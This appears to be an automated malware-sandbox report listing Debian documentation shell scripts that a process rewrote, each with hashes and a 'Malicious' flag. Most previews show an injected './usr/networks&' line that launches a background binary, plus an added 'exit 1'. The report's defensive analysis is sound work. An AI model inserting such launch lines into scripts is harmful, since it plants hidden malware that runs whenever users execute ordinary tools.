                                                                                                          Preview: ./usr/networks&..exit 1 ;;.esac..SUBDIRECTORY_OK=Yes ;# we will cd up.. git-sh-setup.require_work_tree.cd_to_toplevel..no_commit=.xopt=.while case "$#" in 0) break ;; esac.do..case "$1" in..-n|--n|--no|--no-|--no-c|--no-co|--no-com|--no-comm|\.. --no-commi|--no-commit)...no_commit=t...;;..-e|--e|--ed|--edi|--edit)...edit=-e...;;..--n|--no|--no-|--no-e|--no-ed|--no-edi|--no-edit)...edit=...;;..-r)...: no-op ;;..-x|--i-really-want-to-expose-my-private-commit-object-name)...replay=...;;..-X?*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#-X}")"...;;..--strategy-option=*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#--strategy-option=}")"...;;..-X|--strategy-option)...shift...xopt="$xopt$(git rev-parse --sq-quote "--$1")"...;;..-*)...usage...;;..*)...break...;;..esac..shift.done..set_reflog_action "$me"..test "$me,$replay" = "revert,t" && usage..case "$no_commit" in.t)..# We do not intend to commit immediately. We just want to..# merge the differences in...head=$(git-write-tree) ||
                                                                                                          /usr/share/doc/git/contrib/examples/git-tag.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1972
                                                                                                          Entropy (8bit):5.222096129300364
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:kVCbAQZic8rYsnYEdGF+CnnMHx+Hh/3CtRTOa3kK8pKlfoU/Z14bLDSkIJsHTAiJ:k70ic8rZbYHh/SbOYF/ZyLDXHTAdC
                                                                                                          MD5:7E494C753E4F3B80FE7EC6511ECDC764
                                                                                                          SHA1:B13B4AC59D0DE77616C87B56B75CD7BFE73F5820
                                                                                                          SHA-256:E9541DF7E22E58496C9E0936DF12AD0EB2B1E1B577F6D36B946F0FC5FD58E373
                                                                                                          SHA-512:0E542FDDDB9B992C1628BE1BE07169E3C396866513DD97C15E83C20EFDDC0E5ADF9B25D63482A4F93FDD8D2770CD3BEF2DA699AE8CEE062AA3A46F7D33AA35FA
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit $had_error..;;. -v)..shift..tag_name="$1"..tag=$(git show-ref --verify --hash -- "refs/tags/$tag_name") ||...die "Seriously, what tag are you talking about?"..git-verify-tag -v "$tag"..exit $?..;;. -*). usage..;;. *)..break..;;. esac.done..[ -n "$list" ] && exit 0..name="$1".[ "$name" ] || usage.prev=0000000000000000000000000000000000000000.if git show-ref --verify --quiet -- "refs/tags/$name".then. test -n "$force" || die "tag '$name' already exists". prev=$(git rev-parse "refs/tags/$name").fi.shift.git check-ref-format "tags/$name" ||..die "we do not like '$name' as a tag name."..object=$(git rev-parse --verify --default HEAD "$@") || exit 1.type=$(git cat-file -t $object) || exit 1.tagger=$(git var GIT_COMMITTER_IDENT) || exit 1..test -n "$username" ||..username=$(git config user.signingkey) ||..username=$(expr "z$tagger" : 'z\(.*>\)')..trap 'rm -f "$GIT_DIR"/TAG_TMP* "$GIT_DIR"/TAG_FINALMSG "$GIT_DIR"/TAG_EDITMSG' 0..if [ "$annotate" ]
                                                                                                          /usr/share/doc/git/contrib/examples/git-verify-tag.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):243
                                                                                                          Entropy (8bit):5.091025781115778
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVMQPJA4lJx3ULFZZ6+uvHzDTIgTPS2d118LVLyULFZvCY1M9H1x3ULFI/uvTBe:IAO0ZZ6/vH0gTmLNZvW9Vx0BvWv7n
                                                                                                          MD5:BE780CC322587122E892D123BFF726B6
                                                                                                          SHA1:26AA277E5D4A3A0DC6790C3F802334721E341BB3
                                                                                                          SHA-256:3EAAD297334349E1894BEC8495AB5DFB60143BA7087A44B48D31A2E2D880DF17
                                                                                                          SHA-512:8F99561F7551A8EDD954ED1F73DF02AFBFBC8750BBB5F33BDE129AD51F0812862A24CC33CC2A5F7099DC545BCEA6A46962F85D765250FBBBFD48BE73AEE6F218
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.git cat-file tag "$1" >"$GIT_DIR/.tmp-vtag" || exit 1.sed -n -e '../^-----BEGIN PGP SIGNATURE-----$/q..p.' <"$GIT_DIR/.tmp-vtag" |.gpg --verify "$GIT_DIR/.tmp-vtag" - || exit 1.rm -f "$GIT_DIR/.tmp-vtag"../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/examples/git-whatchanged.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):792
                                                                                                          Entropy (8bit):4.925184193549972
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:JdJo5ELpDZNanwyCDIqDZNaEC0I8hWq6vvmYkdBQcaKv5oUvfn:JdJomtDXEwrDRDXUxo6nmYkdB1aSD
                                                                                                          MD5:895868AC151D9953AD152F77240CF73D
                                                                                                          SHA1:FCAAED017977A291A1D2E1E77CFA2A796F23EBA8
                                                                                                          SHA-256:03943D3826EC7CA6398628FBCE75EFA0BECE41CEFE95A6AB90801C7759A5B23E
                                                                                                          SHA-512:AF8FD5A0FBA1B33790C20911F0B1222FDE15C3143463346E0111194B57F1E92704CBC19B1392A6156B02BBD363A0C566E12BD80919C1E7C3ED7344D09ACA8CC0
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.diff_tree_flags=$(git-rev-parse --sq --no-revs --flags "$@") || exit.case "$0" in.*whatchanged)..count=..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get whatchanged.difftree)..diff_tree_default_flags='-c -M --abbrev' ;;.*show)..count=-n1..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get show.difftree)..diff_tree_default_flags='--cc --always' ;;.esac.test -z "$diff_tree_flags" &&..diff_tree_flags="$diff_tree_default_flags"..rev_list_args=$(git-rev-parse --sq --default HEAD --revs-only "$@") &&.diff_tree_args=$(git-rev-parse --sq --no-revs --no-flags "$@") &&..eval "git-rev-list $count $rev_list_args" |.eval "git-diff-tree --stdin --pretty -r $diff_tree_flags $diff_tree_args" |.LESS="$LESS -S" ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/fast-import/git-import.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):486
                                                                                                          Entropy (8bit):5.198694046664742
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                                                                          MD5:84511195A8532AFAED8B6E6645B72FC9
                                                                                                          SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                                                                          SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                                                                          SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/git-resurrect.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2904
                                                                                                          Entropy (8bit):5.006955417229927
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                                                                          MD5:E6A74480E370B07D5BDC026A624CE684
                                                                                                          SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                                                                          SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                                                                          SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                                                          /usr/share/doc/git/contrib/remotes2config.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/rerere-train.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):637
                                                                                                          Entropy (8bit):4.973192610623575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:wp6B2fHx3CXTuKQLcuSKHp+V/uwb+ctPKry/RhT6KHVB+8PfQyKwQgI2KkSr8n:HaR3U0Lp0VDbztPKITbfrCnMSg
                                                                                                          MD5:FA973BE7DB66D335F781F10C137BD908
                                                                                                          SHA1:DFFD51DB653BEF7DEA7D172F98830224F248E767
                                                                                                          SHA-256:22ED58D049502A09B9CA39029671394257E5C2651094498A9D91B8BBBB4FB03E
                                                                                                          SHA-512:74DE024F1503C58852597882F36B96CD697036A22943C26D1A1FD5F76A5CBEDEB384D7E88520547EB0788B718534BD9813FA3B25220B58D4F397050172568D64
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:"Learning from %h %s" "$commit"...git rerere...git checkout -q $commit -- ....git rerere..fi..git reset -q --hard.done..if test -z "$branch".then..git checkout "$original_HEAD".else..git checkout "${branch#refs/heads/}".fi../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/subtree/git-subtree.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14967
                                                                                                          Entropy (8bit):5.111069408805373
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:TVYbrTzRMebrfW0LJKEfUJzXKJ/38TQZNRgZpP1OQSABMfxn8R19mBhogLfbzxHY:+b1MebzW0Vx/Jhzg/MQ3D0fbtZA/1
                                                                                                          MD5:41BA328EB77CD320A36423CADED05D12
                                                                                                          SHA1:8393068799794472918236BBBB43BAAD72C7682F
                                                                                                          SHA-256:1C6220B54F133F09F0E29C3BC4890CE7E3AF0AD29670672F1CD80448E2B9A779
                                                                                                          SHA-512:A7DB8210828B6F0E59B1B73A46C0522E1552A49F956784CD5F001C8747FDF65E3255152B6BBFFCD4E6AB3CF0DDABA3BEBDF0B2D0CCA36B203A62EE2109D871E8
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug().{..if [ -n "$debug" ]; then...printf "%s\n" "$*" >&2..fi.}..say().{..if [ -z "$quiet" ]; then...printf "%s\n" "$*" >&2..fi.}..progress().{..if [ -z "$quiet" ]; then...printf "%s\r" "$*" >&2..fi.}..assert().{..if "$@"; then...:..else...die "assertion failed: " "$@"..fi.}...#echo "Options: $*"..while [ $# -gt 0 ]; do..opt="$1"..shift..case "$opt" in...-q) quiet=1 ;;...-d) debug=1 ;;...--annotate) annotate="$1"; shift ;;...--no-annotate) annotate= ;;...-b) branch="$1"; shift ;;...-P) prefix="${1%/}"; shift ;;...-m) message="$1"; shift ;;...--no-prefix) prefix= ;;...--onto) onto="$1"; shift ;;...--no-onto) onto= ;;...--rejoin) rejoin=1 ;;...--no-rejoin) rejoin= ;;...--ignore-joins) ignore_joins=1 ;;...--no-ignore-joins) ignore_joi
                                                                                                          /usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):822
                                                                                                          Entropy (8bit):5.456000973546581
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:w6vCJsHKfrLCYwTlFfOf4L3DXKPvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+UKXGRBmAF5I0Zl7
                                                                                                          MD5:0D11588BAF66BBD90273FDA188DDA2CD
                                                                                                          SHA1:EE2F4255479F30769F44E8CB5E284E632DD3B4AD
                                                                                                          SHA-256:37757E412DB565E1A291349C036785A00ED5B89431A1598E6C16900BBCFFE356
                                                                                                          SHA-512:991F89DD0AC1B1D3071F5103CAE959FCE46E608EA2F065F248D45727777265C49E30E865CCE16785B9565FD324BE23BCAD3B475A87FF5DCAE28067875CC9DB2E
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=`echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp'`..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):617
                                                                                                          Entropy (8bit):4.789300168717738
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                                                          MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                                                          SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                                                          SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                                                          SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/hddtemp/contribs/hddtemp-all.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1015
                                                                                                          Entropy (8bit):4.896629241453442
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                                                          MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                                                          SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                                                          SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                                                          SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                                                          /usr/share/doc/ifupdown/examples/check-mac-address.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):461
                                                                                                          Entropy (8bit):5.204671186006819
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:boybzOC2OPhB+NT3uGK6nRE9CLAYFyW4CK4jWb+YtYn:bo0PhcdW9CLKW4x4jWi/
                                                                                                          MD5:590EDF96613EB2B783D98ED51A5F19A4
                                                                                                          SHA1:3C6570765592737D02E8010FD9A159A39DCDCC38
                                                                                                          SHA-256:BB77853D6FDBD37E5B234F1ECE3A223E07BDBE02CCEFC70D9FA6849ECB47F59A
                                                                                                          SHA-512:6DC5C0F411328DE21CEFA82E8B1CD57CEE3AF5EDC0144860BEB2B291A534DFB1667B70E95D99586804D2489306377FF1F4B22C8A1D1A4E78353223717C5E47DD
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.# If it does it exits with 0 (success) status;.# if it doesn't then it exists with 1 (error) status...set -e..export LANG=C..if [ ! "$2" ] ; then..echo "Usage: $0 IFACE targetMAC"..exit 1.fi.iface="$1".targetmac=`echo "$2" | sed -e 'y/ABCDEF/abcdef/'`.mac=$(/sbin/ifconfig "$iface" | sed -n -e '/^.*HWaddr \([:[:xdigit:]\-]*\).*/{s//\1/;y/ABCDEF/abcdef/;p;q;}')..if [ "$targetmac" = "$mac" ]; then exit 0; else exit 1; fi../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/ifupdown/examples/get-mac-address.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):92
                                                                                                          Entropy (8bit):4.373538165973413
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVCghzalTFgZNLdMRveMgoOORgn:whzalTFgZNpMRGMgTn
                                                                                                          MD5:15DD9BBF0482D9ADCED6141F43FC3C89
                                                                                                          SHA1:F4416E70988E52171A2F7027509F98AAE444E8B6
                                                                                                          SHA-256:CB678F95B78104B7BD05D11C5AF75843331744E2EAB1504A32627FB30DE17238
                                                                                                          SHA-512:39C8DD448D3D1F8C4BAECB16A395BC55EA2554E4ED627743FC26A76B12C750CE451BC3CE72AEFF94286A260DCB06AC016AE44F9BD3A12372F1DD31776783FE62
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/ifupdown/examples/pcmcia-compat.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):519
                                                                                                          Entropy (8bit):5.218301073324955
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:5HUuJUHUd82RPHUAOBJ6gMWGwWSTsyzEblTKfahBUlTGNCgTn:50QU0NRP0L6g/gfbleqUlw
                                                                                                          MD5:7CE36959719763E25A79EF6FBE77FD68
                                                                                                          SHA1:3D32B1EF561E7CDD58B69D01B30F6F23D339805D
                                                                                                          SHA-256:2C2DA71A12186FDDE2BDFAEA192105B1010C1279BB82334185690788E2EFAF79
                                                                                                          SHA-512:4ACE6DF91473556C67C22C26FA905D93E6BB08D564851AC21BED82609DA4990D032FE81884214CDAA0A149FDEF4D2393CB2A02EE42CDA2743B9BD017918D6605
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.if [ ! -e /etc/pcmcia/shared ]; then exit 1; fi..pcmcia_shared () {... /etc/pcmcia/shared.}..iface="$1"..# /etc/pcmcia/shared sucks.pcmcia_shared "start" $iface.usage () {..exit 1.}..get_info $iface.HWADDR=`/sbin/ifconfig $DEVICE | sed -n -e 's/.*addr \([^ ]*\) */\1/p'`..which="".while read glob scheme; do..if [ "$which" ]; then continue; fi..case "$SCHEME,$SOCKET,$INSTANCE,$HWADDR" in...$glob) which=$scheme ;;..esac.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/ifupdown/examples/ping-places.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):633
                                                                                                          Entropy (8bit):4.881818972878624
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:5EmBJQX+U2/lTxroNurUQm6k0fQmje5jrGlTGNCgTn:hQWldrK8Dq0o+e1Glw
                                                                                                          MD5:99E4E569B07969486DA912C2B9A33E23
                                                                                                          SHA1:3BAA43B8E0D2B693C426DDA2FA6D67DEAEADB09C
                                                                                                          SHA-256:3C5803C83626B98195C7F48B7B83D131670DFA9541EDB8B30915C684FD39CCB9
                                                                                                          SHA-512:8BAE9DC8E5F540044980649EF028FEF8C4FE945B05578EE1DB963A32AABC53F7D24FCD5DDB396FB9430E4CDFB6E1E6F19A535A1790072F5750D961F4FB8E3214
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.if [ `id -u` -ne 0 ] || [ "$1" = "" ]; then exit 1; fi..if [ -x /usr/bin/fping ]; then..PING="/usr/bin/fping".else..PING="/bin/ping -c 2".fi..iface="$1".which=""..while read addr pingme scheme; do..if [ "$which" ]; then continue; fi...#echo " Trying $addr & $pingme ($scheme)" >&2...ip addr add $addr dev $iface >/dev/null 2>&1..ip link set $iface up >/dev/null 2>&1...if $PING $pingme >/dev/null 2>&1; then...which="$scheme"...fi..ip link set $iface down >/dev/null 2>&1..ip addr del $addr dev $iface >/dev/null 2>&1.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/lm-sensors/examples/daemon/healthd.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):266
                                                                                                          Entropy (8bit):4.736279036741599
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                                                          MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                                                          SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                                                          SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                                                          SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                                                          Malicious:false
                                                                                                          Preview: ./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2712
                                                                                                          Entropy (8bit):5.4524991837552035
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                                                          MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                                                          SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                                                          SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                                                          SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                                                          Malicious:false
